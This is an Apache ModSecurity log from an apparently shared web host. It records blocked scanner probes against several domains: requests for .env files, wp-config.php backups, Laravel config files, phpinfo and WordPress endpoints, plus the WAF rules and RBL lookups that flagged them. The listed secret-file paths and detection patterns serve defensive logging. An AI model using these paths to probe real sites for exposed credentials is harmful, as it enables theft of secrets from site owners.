[Tue May 26 15:06:50.702666 2026] [security2:error] [pid 678998:tid 679134] [client 45.148.10.62:47646] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVpsp-Rl4i_pgT-iAd1_QAAAAY"]
[Tue May 26 15:06:50.877016 2026] [security2:error] [pid 678998:tid 679140] [client 8.231.137.155:54025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.137.231.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shreegajanan.onesoft.in"] [uri "/xmlrpc.php"] [unique_id "ahVpsp-Rl4i_pgT-iAd2AQAAAAw"]
[Tue May 26 15:06:51.129850 2026] [security2:error] [pid 678998:tid 679195] [client 45.148.10.62:47646] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVpsp-Rl4i_pgT-iAd2CwAAAEM"]
[Tue May 26 15:06:51.248841 2026] [security2:error] [pid 678998:tid 679045] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.development"] [unique_id "ahVps5-Rl4i_pgT-iAd2EwAAFy4"]
[Tue May 26 15:06:51.280188 2026] [security2:error] [pid 678998:tid 679173] [client 45.148.10.62:47646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/phpinfo.php"] [unique_id "ahVps5-Rl4i_pgT-iAd2FAAAAC0"]
[Tue May 26 15:06:51.633612 2026] [security2:error] [pid 678998:tid 679186] [client 8.231.137.155:51742] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVps5-Rl4i_pgT-iAd2IQAAADo"]
[Tue May 26 15:06:51.858737 2026] [security2:error] [pid 678998:tid 679245] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVps5-Rl4i_pgT-iAd2GgAAAHU"]
[Tue May 26 15:06:52.349308 2026] [security2:error] [pid 678998:tid 679243] [client 8.231.137.155:62818] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVptJ-Rl4i_pgT-iAd2OAAAAHM"]
[Tue May 26 15:06:53.024832 2026] [security2:error] [pid 678998:tid 679102] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/private/.env"] [unique_id "ahVptZ-Rl4i_pgT-iAd2SQAAXGc"]
[Tue May 26 15:06:53.042070 2026] [security2:error] [pid 678998:tid 679188] [client 8.231.137.155:52676] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVptZ-Rl4i_pgT-iAd2SgAAADw"]
[Tue May 26 15:06:53.618940 2026] [security2:error] [pid 678998:tid 679159] [client 8.231.137.155:51904] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVptZ-Rl4i_pgT-iAd2XQAAAB8"]
[Tue May 26 15:06:53.826891 2026] [security2:error] [pid 678998:tid 679149] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVptZ-Rl4i_pgT-iAd2WQAAABU"]
[Tue May 26 15:06:54.148696 2026] [security2:error] [pid 678998:tid 679141] [client 8.231.137.155:65153] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVptp-Rl4i_pgT-iAd2ZAAAAA0"]
[Tue May 26 15:06:54.775235 2026] [security2:error] [pid 678998:tid 679134] [client 8.231.137.155:61713] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVptp-Rl4i_pgT-iAd2dgAAAAY"]
[Tue May 26 15:06:54.897013 2026] [security2:error] [pid 678998:tid 679105] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/user/.env.staging"] [unique_id "ahVptp-Rl4i_pgT-iAd2ewAAZGo"]
[Tue May 26 15:06:55.139037 2026] [security2:error] [pid 678998:tid 679243] [client 159.69.158.189:32056] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVptp-Rl4i_pgT-iAd2bgAAAHM"], referer: http://ucdc.co.in/
[Tue May 26 15:06:55.218463 2026] [security2:error] [pid 678998:tid 679138] [client 8.231.137.155:62508] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVpt5-Rl4i_pgT-iAd2gQAAAAo"]
[Tue May 26 15:06:55.673052 2026] [security2:error] [pid 678998:tid 679245] [client 8.231.137.155:51435] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVpt5-Rl4i_pgT-iAd2kwAAAHU"]
[Tue May 26 15:06:56.074005 2026] [security2:error] [pid 678998:tid 679193] [client 8.231.137.155:57365] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVpuJ-Rl4i_pgT-iAd2ngAAAEE"]
[Tue May 26 15:06:56.158047 2026] [security2:error] [pid 678998:tid 679215] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpt5-Rl4i_pgT-iAd2lgAAAFc"]
[Tue May 26 15:06:56.508020 2026] [security2:error] [pid 678998:tid 679216] [client 8.231.137.155:63618] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVpuJ-Rl4i_pgT-iAd2sQAAAFg"]
[Tue May 26 15:06:56.768507 2026] [security2:error] [pid 678998:tid 679107] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/doc/.env"] [unique_id "ahVpuJ-Rl4i_pgT-iAd2tgAAAmw"]
[Tue May 26 15:06:56.956366 2026] [security2:error] [pid 678998:tid 679219] [client 8.231.137.155:56541] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shreegajanan.onesoft.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVpuJ-Rl4i_pgT-iAd2wAAAAFs"]
[Tue May 26 15:06:57.137349 2026] [security2:error] [pid 678998:tid 679112] [remote 74.7.241.58:40834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVpuZ-Rl4i_pgT-iAd2xgAAD3E"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 15:06:58.322602 2026] [security2:error] [pid 678998:tid 679168] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpuZ-Rl4i_pgT-iAd21gAAACg"]
[Tue May 26 15:06:58.369540 2026] [security2:error] [pid 678998:tid 679213] [client 107.196.177.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpuZ-Rl4i_pgT-iAd22QAAAFU"]
[Tue May 26 15:06:58.595438 2026] [security2:error] [pid 678998:tid 679114] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.stage"] [unique_id "ahVpup-Rl4i_pgT-iAd27gAAd3M"]
[Tue May 26 15:07:00.384766 2026] [security2:error] [pid 678998:tid 679012] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/v1/.env"] [unique_id "ahVpvJ-Rl4i_pgT-iAd3HwAAcw0"]
[Tue May 26 15:07:00.561158 2026] [security2:error] [pid 678998:tid 679254] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpvJ-Rl4i_pgT-iAd3EAAAAH4"]
[Tue May 26 15:07:02.227743 2026] [security2:error] [pid 678998:tid 679019] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/dev/.env"] [unique_id "ahVpvp-Rl4i_pgT-iAd3TQAAPRQ"]
[Tue May 26 15:07:02.567635 2026] [security2:error] [pid 678998:tid 679170] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpvp-Rl4i_pgT-iAd3SgAAACo"]
[Tue May 26 15:07:04.115275 2026] [security2:error] [pid 678998:tid 679026] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/dashboard/.env"] [unique_id "ahVpwJ-Rl4i_pgT-iAd3eQAAExs"]
[Tue May 26 15:07:04.727259 2026] [security2:error] [pid 678998:tid 679190] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpwJ-Rl4i_pgT-iAd3ggAAAD4"]
[Tue May 26 15:07:06.113983 2026] [security2:error] [pid 678998:tid 679049] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.in"] [unique_id "ahVpwp-Rl4i_pgT-iAd3swAAJDI"]
[Tue May 26 15:07:06.564057 2026] [security2:error] [pid 678998:tid 679172] [client 34.147.90.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahVpwp-Rl4i_pgT-iAd3wwAAACw"]
[Tue May 26 15:07:06.564429 2026] [security2:error] [pid 678998:tid 679221] [client 34.147.90.246:41338] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahVpwp-Rl4i_pgT-iAd3tAAAAF0"]
[Tue May 26 15:07:06.880012 2026] [security2:error] [pid 678998:tid 679198] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpwp-Rl4i_pgT-iAd3uAAAAEY"]
[Tue May 26 15:07:07.921796 2026] [security2:error] [pid 678998:tid 679031] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/v3/.env"] [unique_id "ahVpw5-Rl4i_pgT-iAd38gAAfiA"]
[Tue May 26 15:07:08.613588 2026] [security2:error] [pid 678998:tid 679192] [client 34.13.231.227:45498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.231.13.34.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahVpxJ-Rl4i_pgT-iAd4AgAAAEA"]
[Tue May 26 15:07:08.776475 2026] [security2:error] [pid 678998:tid 679063] [remote 51.91.98.45:33718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVpxJ-Rl4i_pgT-iAd4BwAAbkA"]
[Tue May 26 15:07:09.061526 2026] [security2:error] [pid 678998:tid 679203] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpxJ-Rl4i_pgT-iAd4CgAAAEs"]
[Tue May 26 15:07:09.722801 2026] [security2:error] [pid 678998:tid 679039] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.dist"] [unique_id "ahVpxZ-Rl4i_pgT-iAd4KAAAYCg"]
[Tue May 26 15:07:10.501194 2026] [security2:error] [pid 678998:tid 679170] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpxp-Rl4i_pgT-iAd4NgAAACo"]
[Tue May 26 15:07:11.529142 2026] [security2:error] [pid 678998:tid 679086] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/filesystems.php"] [unique_id "ahVpx5-Rl4i_pgT-iAd4YgAAEFc"]
[Tue May 26 15:07:13.281893 2026] [security2:error] [pid 678998:tid 679233] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpyJ-Rl4i_pgT-iAd4iwAAAGk"]
[Tue May 26 15:07:13.343306 2026] [security2:error] [pid 678998:tid 679081] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/mail.php"] [unique_id "ahVpyZ-Rl4i_pgT-iAd4mAAASFI"]
[Tue May 26 15:07:15.176487 2026] [security2:error] [pid 678998:tid 679092] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "adityacreations.co.in"] [uri "/wp-config.php.orig"] [unique_id "ahVpy5-Rl4i_pgT-iAd43wAAC10"]
[Tue May 26 15:07:15.244527 2026] [security2:error] [pid 678998:tid 679154] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpyp-Rl4i_pgT-iAd40AAAABo"]
[Tue May 26 15:07:17.119994 2026] [security2:error] [pid 678998:tid 679091] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/wp-config.php"] [unique_id "ahVpzZ-Rl4i_pgT-iAd5HQAARFw"]
[Tue May 26 15:07:17.689917 2026] [security2:error] [pid 678998:tid 679222] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpzZ-Rl4i_pgT-iAd5IQAAAF4"]
[Tue May 26 15:07:18.966025 2026] [security2:error] [pid 678998:tid 679179] [client 193.122.148.122:43308] ModSecurity: Warning. Matched phrase "Disco" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVpzp-Rl4i_pgT-iAd5UQAAADM"]
[Tue May 26 15:07:19.048749 2026] [security2:error] [pid 678998:tid 679099] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/index.php"] [unique_id "ahVpz5-Rl4i_pgT-iAd5UgAAR2Q"]
[Tue May 26 15:07:19.199156 2026] [security2:error] [pid 678998:tid 679128] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpzp-Rl4i_pgT-iAd5TAAAAAA"]
[Tue May 26 15:07:20.888321 2026] [security2:error] [pid 678998:tid 679110] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/temp.php"] [unique_id "ahVp0J-Rl4i_pgT-iAd5fQAAOW8"]
[Tue May 26 15:07:21.345489 2026] [security2:error] [pid 678998:tid 679159] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp0J-Rl4i_pgT-iAd5fgAAAB8"]
[Tue May 26 15:07:22.721696 2026] [security2:error] [pid 678998:tid 679123] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/queue.php"] [unique_id "ahVp0p-Rl4i_pgT-iAd5sAAAL3w"]
[Tue May 26 15:07:24.380706 2026] [security2:error] [pid 678998:tid 679196] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp05-Rl4i_pgT-iAd52QAAAEQ"]
[Tue May 26 15:07:24.542446 2026] [security2:error] [pid 678998:tid 679002] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/services.php"] [unique_id "ahVp1J-Rl4i_pgT-iAd57AAADwM"]
[Tue May 26 15:07:25.599526 2026] [security2:error] [pid 678998:tid 679219] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp1Z-Rl4i_pgT-iAd5_wAAAFs"]
[Tue May 26 15:07:26.375565 2026] [security2:error] [pid 678998:tid 679012] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/info"] [unique_id "ahVp1p-Rl4i_pgT-iAd6HAAANw0"]
[Tue May 26 15:07:27.250999 2026] [security2:error] [pid 678998:tid 679249] [client 202.76.172.126:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp1p-Rl4i_pgT-iAd6MQAAAHk"]
[Tue May 26 15:07:28.071775 2026] [security2:error] [pid 678998:tid 679202] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp15-Rl4i_pgT-iAd6TgAAAEo"]
[Tue May 26 15:07:28.275211 2026] [security2:error] [pid 678998:tid 679014] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/phpinfo.php3"] [unique_id "ahVp2J-Rl4i_pgT-iAd6ZQAAZg8"]
[Tue May 26 15:07:28.822091 2026] [security2:error] [pid 678998:tid 679128] [client 114.119.150.166:64323] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVp2J-Rl4i_pgT-iAd6nAAAAAA"], referer: https://glorodavionics.com?route=product/product&manufacturer_id=11&product_id=111
[Tue May 26 15:07:30.208896 2026] [security2:error] [pid 678998:tid 679080] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/_profiler/info"] [unique_id "ahVp2p-Rl4i_pgT-iAd62wAAFFE"]
